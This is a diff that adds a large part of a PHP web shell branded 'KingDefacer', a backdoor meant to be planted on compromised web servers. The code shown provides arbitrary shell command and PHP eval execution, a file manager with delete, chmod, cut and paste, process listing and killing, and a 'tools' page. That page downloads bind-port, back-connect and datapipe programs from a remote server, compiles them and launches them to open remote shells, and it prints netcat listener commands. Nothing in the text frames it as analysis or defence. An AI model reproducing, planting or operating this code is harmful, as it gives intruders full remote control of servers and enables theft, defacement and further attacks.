+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  KingDefacer_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  KingDefacer_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  KingDefacer_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; KingDefacerexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "tools")
+{
+ $bndportsrcs = array(
+  "KingDefacer_bindport.pl"=>array("Using PERL","perl %path %port"),
+  "KingDefacer_bindport.c"=>array("Using C","%path %port %pass")
+ );
+ $bcsrcs = array(
+  "KingDefacer_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+  "KingDefacer_backconn.c"=>array("Using C","%path %host %port")
+ );
+ $dpsrcs = array(
+  "KingDefacer_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
+  "KingDefacer_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
+ );
+ if (!is_array($bind)) {$bind = array();}
+ if (!is_array($bc)) {$bc = array();}
+ if (!is_array($datapipe)) {$datapipe = array();}
+ 
+ if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
+ if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
+  
+ if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
+ if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
+ 
+ if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
+ if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
+ if (!empty($bindsubmit))
+ {
+  echo "<b>Result of binding port:</b><br>";
+  $v = $bndportsrcs[$bind["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $w = explode(".",$bind["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = KingDefacergetsource($bind["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%port",$bind["port"],$v[1]);
+    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
+    else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ if (!empty($bcsubmit))
+ {
+  echo "<b>Result of back connection:</b><br>";
+  $v = $bcsrcs[$bc["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  else
+  {
+   $w = explode(".",$bc["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = KingDefacergetsource($bc["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%host",$bc["host"],$v[1]);
+    $v[1] = str_replace("%port",$bc["port"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
+   }
+  }
+ }
+ if (!empty($dpsubmit))
+ {
+  echo "<b>Result of datapipe-running:</b><br>";
+  $v = $dpsrcs[$datapipe["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $srcpath = $tmpdir.$datapipe["src"];
+   $w = explode(".",$datapipe["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = KingDefacergetsource($datapipe["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
+    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
+    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
+    else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
+ foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+ ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
+<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
+foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
+}
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
